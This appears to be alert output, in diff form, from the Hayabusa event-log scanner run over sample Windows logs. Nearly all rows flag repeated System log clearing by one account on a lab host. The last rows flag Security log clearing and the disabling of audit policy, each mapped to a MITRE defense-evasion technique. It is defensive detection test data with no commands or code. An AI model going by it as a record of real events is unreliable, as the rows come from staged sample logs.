+2021-10-26 03:11:09.215 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.293 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.340 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.355 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.418 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.480 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.527 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.574 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.591 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.606 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.638 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.653 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.669 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.747 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.778 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.794 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.841 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.856 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.888 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.903 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.950 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:09.997 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.028 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.044 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.059 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.075 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.106 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.138 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.184 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.200 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.216 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.231 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.263 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.294 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.309 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.325 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.341 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.356 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.403 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.419 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.434 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.450 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.481 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.481 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.497 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.528 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.747 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.763 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.778 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.794 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.809 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.856 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.934 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:10.997 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.028 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.091 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.106 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.184 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.200 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.216 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.247 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.341 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.388 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.403 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.450 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.559 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.575 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.622 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.700 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.747 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.778 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.825 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.841 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.856 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.872 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.888 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.903 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:11.997 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:12.059 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:12.075 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:12.106 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:12.153 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:12.184 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:11:12.247 +09:00,FS03.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/System/104_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.001-Clear Windows event logs/ID104-1102-Event log cleared.evtx
+2021-10-26 03:21:02.504 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Audit policy enumerated.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
+2021-10-26 03:30:36.515 +09:00,FS03.offsec.lan,4719,high,Evas,Disabling Windows Event Auditing,,../hayabusa-rules/sigma/builtin/security/win_disable_event_logging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.xxx-Audit policy disabled/ID4719-Audit policy deactivation.evtx
